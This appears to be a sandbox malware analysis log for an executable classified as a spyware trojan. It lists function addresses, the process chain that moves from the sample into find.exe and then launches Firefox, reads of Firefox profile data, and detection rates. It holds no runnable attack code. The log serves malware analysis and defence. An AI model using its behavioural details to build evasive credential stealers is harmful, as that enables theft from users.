                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA802_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119CD1F2_2_0119CD1F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110AD002_2_0110AD00
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01118DBF2_2_01118DBF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FADE02_2_010FADE0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100C002_2_01100C00
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0CB52_2_011A0CB5
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F0CF22_2_010F0CF2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01120F302_2_01120F30
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A2F302_2_011A2F30
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01142F282_2_01142F28
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01174F402_2_01174F40
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117EFA02_2_0117EFA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F2FC82_2_010F2FC8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BEE262_2_011BEE26
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100E592_2_01100E59
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01112E902_2_01112E90
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BCE932_2_011BCE93
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BEEDB2_2_011BEEDB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011CB16B2_2_011CB16B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EF1722_2_010EF172
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0113516C2_2_0113516C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110B1B02_2_0110B1B0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011070C02_2_011070C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AF0CC2_2_011AF0CC
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B70E92_2_011B70E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BF0E02_2_011BF0E0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B132D2_2_011B132D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010ED34C2_2_010ED34C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0114739A2_2_0114739A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011052A02_2_011052A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111B2C02_2_0111B2C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111D2F02_2_0111D2F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A12ED2_2_011A12ED
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B75712_2_011B7571
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119D5B02_2_0119D5B0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C95C32_2_011C95C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BF43F2_2_011BF43F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F14602_2_010F1460
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BF7B02_2_011BF7B0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011456302_2_01145630
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B16CC2_2_011B16CC
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011959102_2_01195910
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011099502_2_01109950
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111B9502_2_0111B950
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116D8002_2_0116D800
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011038E02_2_011038E0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BFB762_2_011BFB76
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111FB802_2_0111FB80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01175BF02_2_01175BF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0113DBF92_2_0113DBF9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BFA492_2_011BFA49
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B7A462_2_011B7A46
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01173A6C2_2_01173A6C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01145AA02_2_01145AA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119DAAC2_2_0119DAAC
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A1AA32_2_011A1AA3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011ADAC62_2_011ADAC6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B1D5A2_2_011B1D5A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01103D402_2_01103D40
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B7D732_2_011B7D73
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111FDC02_2_0111FDC0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01179C322_2_01179C32
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BFCF22_2_011BFCF2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BFF092_2_011BFF09
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01101F922_2_01101F92
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BFFB12_2_011BFFB1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010C3FD52_2_010C3FD5
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010C3FD22_2_010C3FD2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01109EB02_2_01109EB0
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeCode function: 3_2_02D9EA563_2_02D9EA56
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeCode function: 3_2_02DA72463_2_02DA7246
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeCode function: 3_2_02DA72443_2_02DA7244
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeCode function: 3_2_02DA0A763_2_02DA0A76
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeCode function: 3_2_02D9EB9A3_2_02D9EB9A
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeCode function: 3_2_02D9EBA63_2_02D9EBA6
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeCode function: 3_2_02DA08563_2_02DA0856
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeCode function: 3_2_02DA084E3_2_02DA084E
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeCode function: 3_2_02DBF6F63_2_02DBF6F6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317A3524_2_0317A352
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030CE3F04_2_030CE3F0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031803E64_2_031803E6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031602744_2_03160274
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031402C04_2_031402C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030B01004_2_030B0100
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0315A1184_2_0315A118
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031481584_2_03148158
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031801AA4_2_031801AA
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031741A24_2_031741A2
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031781CC4_2_031781CC
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031520004_2_03152000
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030E47504_2_030E4750
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C07704_2_030C0770
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030BC7C04_2_030BC7C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030DC6E04_2_030DC6E0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C05354_2_030C0535
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031805914_2_03180591
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031644204_2_03164420
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031724464_2_03172446
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0316E4F64_2_0316E4F6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317AB404_2_0317AB40
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03176BD74_2_03176BD7
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030BEA804_2_030BEA80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030D69624_2_030D6962
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C29A04_2_030C29A0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0318A9A64_2_0318A9A6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030CA8404_2_030CA840
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C28404_2_030C2840
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030A68B84_2_030A68B8
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030EE8F04_2_030EE8F0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03162F304_2_03162F30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03102F284_2_03102F28
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030E0F304_2_030E0F30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03134F404_2_03134F40
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0313EFA04_2_0313EFA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030B2FC84_2_030B2FC8
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317EE264_2_0317EE26
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C0E594_2_030C0E59
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317CE934_2_0317CE93
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030D2E904_2_030D2E90
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317EEDB4_2_0317EEDB
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0315CD1F4_2_0315CD1F
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030CAD004_2_030CAD00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030D8DBF4_2_030D8DBF
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030BADE04_2_030BADE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C0C004_2_030C0C00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03160CB54_2_03160CB5
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030B0CF24_2_030B0CF2
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317132D4_2_0317132D
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030AD34C4_2_030AD34C
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0310739A4_2_0310739A
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C52A04_2_030C52A0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030DB2C04_2_030DB2C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031612ED4_2_031612ED
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030DD2F04_2_030DD2F0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F516C4_2_030F516C
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0318B16B4_2_0318B16B
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030AF1724_2_030AF172
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030CB1B04_2_030CB1B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C70C04_2_030C70C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0316F0CC4_2_0316F0CC
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317F0E04_2_0317F0E0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031770E94_2_031770E9
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317F7B04_2_0317F7B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031056304_2_03105630
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031716CC4_2_031716CC
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031775714_2_03177571
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0315D5B04_2_0315D5B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031895C34_2_031895C3
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317F43F4_2_0317F43F
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030B14604_2_030B1460
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317FB764_2_0317FB76
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030DFB804_2_030DFB80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03135BF04_2_03135BF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030FDBF94_2_030FDBF9
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03177A464_2_03177A46
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317FA494_2_0317FA49
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03133A6C4_2_03133A6C
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03105AA04_2_03105AA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03161AA34_2_03161AA3
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0315DAAC4_2_0315DAAC
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0316DAC64_2_0316DAC6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_031559104_2_03155910
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C99504_2_030C9950
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030DB9504_2_030DB950
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0312D8004_2_0312D800
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C38E04_2_030C38E0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317FF094_2_0317FF09
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C1F924_2_030C1F92
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317FFB14_2_0317FFB1
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03083FD24_2_03083FD2
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03083FD54_2_03083FD5
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C9EB04_2_030C9EB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030C3D404_2_030C3D40
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03171D5A4_2_03171D5A
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03177D734_2_03177D73
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030DFDC04_2_030DFDC0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_03139C324_2_03139C32
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_0317FCF24_2_0317FCF2
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008B1EE04_2_008B1EE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008ACDA84_2_008ACDA8
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008ACDB04_2_008ACDB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008AAFA64_2_008AAFA6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008AAFB04_2_008AAFB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008ACFD04_2_008ACFD0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008AB0F44_2_008AB0F4
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008AB1004_2_008AB100
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008B55B04_2_008B55B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008B379E4_2_008B379E
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008B37A04_2_008B37A0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008CBC504_2_008CBC50
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_02FA020D4_2_02FA020D
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_02FAE3084_2_02FAE308
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_02FAE7C84_2_02FAE7C8
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_02FAE4234_2_02FAE423
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_02FAD8884_2_02FAD888
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 0313F290 appears 103 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 030AB970 appears 262 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 03107E54 appears 107 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 030F5130 appears 58 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 0312EA12 appears 86 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: String function: 0117F290 appears 103 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: String function: 01147E54 appears 107 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: String function: 010EB970 appears 262 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: String function: 01135130 appears 58 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: String function: 0116EA12 appears 86 times
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1702582188.0000000007E60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1697576288.00000000031FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1698119849.00000000041B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1701516930.0000000007C40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000000.1672151636.0000000000EC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedAwj.exe4 vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1696441041.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000011ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFIND.EXEj% vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFIND.EXEj% vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exeBinary or memory string: OriginalFilenamedAwj.exe4 vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: QsBdpe1gK5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/11
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QsBdpe1gK5.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\find.exeFile created: C:\Users\user\AppData\Local\Temp\e151968Jump to behavior
                      Source: QsBdpe1gK5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: QsBdpe1gK5.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4126326491.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2028392218.0000000002C88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: QsBdpe1gK5.exeVirustotal: Detection: 80%
                      Source: QsBdpe1gK5.exeReversingLabs: Detection: 87%
                      Source: unknownProcess created: C:\Users\user\Desktop\QsBdpe1gK5.exe "C:\Users\user\Desktop\QsBdpe1gK5.exe"
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess created: C:\Users\user\Desktop\QsBdpe1gK5.exe "C:\Users\user\Desktop\QsBdpe1gK5.exe"
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
                      Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess created: C:\Users\user\Desktop\QsBdpe1gK5.exe "C:\Users\user\Desktop\QsBdpe1gK5.exe"Jump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: sspicli.dllJump to behavior
